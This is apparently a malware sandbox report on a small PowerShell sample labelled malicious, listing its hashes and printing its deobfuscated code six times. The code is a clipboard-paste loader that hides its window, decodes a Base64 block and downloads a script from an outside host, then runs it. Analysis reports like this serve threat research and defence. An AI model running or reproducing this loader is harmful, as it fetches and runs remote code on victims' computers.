Malicious
Malicious

3c74d21543d6ff780df842652d890f72

PowerShell
|
MD5: 3c74d21543d6ff780df842652d890f72
|
Size: 868 B
|
application/x-powershell

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
3c74d21543d6ff780df842652d890f72
Sha1
deec7596b98971d022168e9d6c753c63b6f35c4c
Sha256
f58056af2ee8a026f77617845746947929b52140b4c7240bdfb985fcef6b6279
Sha384
8f61c654ccc2c668135631b1d1a0734114bba69a2044ec0c740bd4d1567dab9385b37d6d63684261ab40d64136d1e53c
Sha512
1306312d6235919c8b0d484d5bd2264509729dd03015d9b5af4dce437129d9aeaf58a4a226af8d5da4e636c272d98c4aeeafe2a06136e2d1dfb00ff11a009d49
SSDeep
12:s8U0lu/LCUcQ9Oqa3tgB1O+PPzazLgyaIS1PKC2Gs8BxS55ksz8vJpp6aFCIq29:ELCUnLa34hPP+zLw1PKC2Gxo+DpBTt
TLSH
F011F418375F7DE409D484778E8928EF961101AC1D6415D837CDC2516F6B1CF167B30C
File Structure
3c74d21543d6ff780df842652d890f72
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Artefacts
Name
 Value
Deobfuscated PowerShell

powershell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(260));" ((Add-Type "[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);" -Name "W" -PassThru)::"ShowWindow"((Get-Process -Id $PID)."MainWindowHandle", 0)) Write-Host "Please wait." $zygn = "i*x" $wphu = [Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("V3JpdGUtSG9zdCAiUGxlYXNlIHdhaXQuIjsgJHp5Z249ImZhNTVjNCI7ICR3Y3R5PSJodHQiKyJwczovLyIrIm1lbGFzaW8iKyIuIisiY29tIisiL3VwZC9jbHAiOyAkZXlwbD0iaSp4IjsgJHd1aW89Iip3ciI7IFtTY3JpcHRCbG9ja106OkNyZWF0ZSgoLigoZ2NtICR3dWlvKSkgLVVyaSAkd2N0eSAtVXNlQmFzaWNQYXJzaW5nKSkuSW52b2tlKCkgfC4oKGdjbSAkZXlwbCkp")) . ((Get-Command $zygn)) $wphu
Deobfuscated PowerShell

powershell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(260));" ((Add-Type "[DllImport(" "user32.dll)]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);" -Name "W" -PassThru)::"ShowWindow"((Get-Process -Id $PID)."MainWindowHandle", 0)) Write-Host "Please wait." $zygn = "i*x" $wphu = [Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("V3JpdGUtSG9zdCAiUGxlYXNlIHdhaXQuIjsgJHp5Z249ImZhNTVjNCI7ICR3Y3R5PSJodHQiKyJwczovLyIrIm1lbGFzaW8iKyIuIisiY29tIisiL3VwZC9jbHAiOyAkZXlwbD0iaSp4IjsgJHd1aW89Iip3ciI7IFtTY3JpcHRCbG9ja106OkNyZWF0ZSgoLigoZ2NtICR3dWlvKSkgLVVyaSAkd2N0eSAtVXNlQmFzaWNQYXJzaW5nKSkuSW52b2tlKCkgfC4oKGdjbSAkZXlwbCkp")) . ((Get-Command $zygn)) $wphu
Deobfuscated PowerShell

powershell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(260));" ((Add-Type "[DllImport(" "user32.dll)]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);" -Name "W" -PassThru)::"ShowWindow"((Get-Process -Id $PID)."MainWindowHandle", 0)) Write-Host "Please wait." $zygn = "i*x" $wphu = [Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("V3JpdGUtSG9zdCAiUGxlYXNlIHdhaXQuIjsgJHp5Z249ImZhNTVjNCI7ICR3Y3R5PSJodHQiKyJwczovLyIrIm1lbGFzaW8iKyIuIisiY29tIisiL3VwZC9jbHAiOyAkZXlwbD0iaSp4IjsgJHd1aW89Iip3ciI7IFtTY3JpcHRCbG9ja106OkNyZWF0ZSgoLigoZ2NtICR3dWlvKSkgLVVyaSAkd2N0eSAtVXNlQmFzaWNQYXJzaW5nKSkuSW52b2tlKCkgfC4oKGdjbSAkZXlwbCkp")) . ((Get-Command $zygn)) $wphu
3c74d21543d6ff780df842652d890f72 (868 B)
File Structure
3c74d21543d6ff780df842652d890f72
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
Deobfuscated PowerShell

powershell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(260));" ((Add-Type "[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);" -Name "W" -PassThru)::"ShowWindow"((Get-Process -Id $PID)."MainWindowHandle", 0)) Write-Host "Please wait." $zygn = "i*x" $wphu = [Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("V3JpdGUtSG9zdCAiUGxlYXNlIHdhaXQuIjsgJHp5Z249ImZhNTVjNCI7ICR3Y3R5PSJodHQiKyJwczovLyIrIm1lbGFzaW8iKyIuIisiY29tIisiL3VwZC9jbHAiOyAkZXlwbD0iaSp4IjsgJHd1aW89Iip3ciI7IFtTY3JpcHRCbG9ja106OkNyZWF0ZSgoLigoZ2NtICR3dWlvKSkgLVVyaSAkd2N0eSAtVXNlQmFzaWNQYXJzaW5nKSkuSW52b2tlKCkgfC4oKGdjbSAkZXlwbCkp")) . ((Get-Command $zygn)) $wphu

Malicious

3c74d21543d6ff780df842652d890f72
Deobfuscated PowerShell

powershell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(260));" ((Add-Type "[DllImport(" "user32.dll)]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);" -Name "W" -PassThru)::"ShowWindow"((Get-Process -Id $PID)."MainWindowHandle", 0)) Write-Host "Please wait." $zygn = "i*x" $wphu = [Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("V3JpdGUtSG9zdCAiUGxlYXNlIHdhaXQuIjsgJHp5Z249ImZhNTVjNCI7ICR3Y3R5PSJodHQiKyJwczovLyIrIm1lbGFzaW8iKyIuIisiY29tIisiL3VwZC9jbHAiOyAkZXlwbD0iaSp4IjsgJHd1aW89Iip3ciI7IFtTY3JpcHRCbG9ja106OkNyZWF0ZSgoLigoZ2NtICR3dWlvKSkgLVVyaSAkd2N0eSAtVXNlQmFzaWNQYXJzaW5nKSkuSW52b2tlKCkgfC4oKGdjbSAkZXlwbCkp")) . ((Get-Command $zygn)) $wphu

Malicious

3c74d21543d6ff780df842652d890f72 > [Deobfuscated PS]
Deobfuscated PowerShell

powershell -c "Invoke-Expression((Get-Clipboard -Raw).Substring(260));" ((Add-Type "[DllImport(" "user32.dll)]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);" -Name "W" -PassThru)::"ShowWindow"((Get-Process -Id $PID)."MainWindowHandle", 0)) Write-Host "Please wait." $zygn = "i*x" $wphu = [Encoding]::"UTF8"."GetString"([Convert]::"FromBase64String"("V3JpdGUtSG9zdCAiUGxlYXNlIHdhaXQuIjsgJHp5Z249ImZhNTVjNCI7ICR3Y3R5PSJodHQiKyJwczovLyIrIm1lbGFzaW8iKyIuIisiY29tIisiL3VwZC9jbHAiOyAkZXlwbD0iaSp4IjsgJHd1aW89Iip3ciI7IFtTY3JpcHRCbG9ja106OkNyZWF0ZSgoLigoZ2NtICR3dWlvKSkgLVVyaSAkd2N0eSAtVXNlQmFzaWNQYXJzaW5nKSkuSW52b2tlKCkgfC4oKGdjbSAkZXlwbCkp")) . ((Get-Command $zygn)) $wphu

Malicious

3c74d21543d6ff780df842652d890f72 > [Deobfuscated PS] > [Deobfuscated PS]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙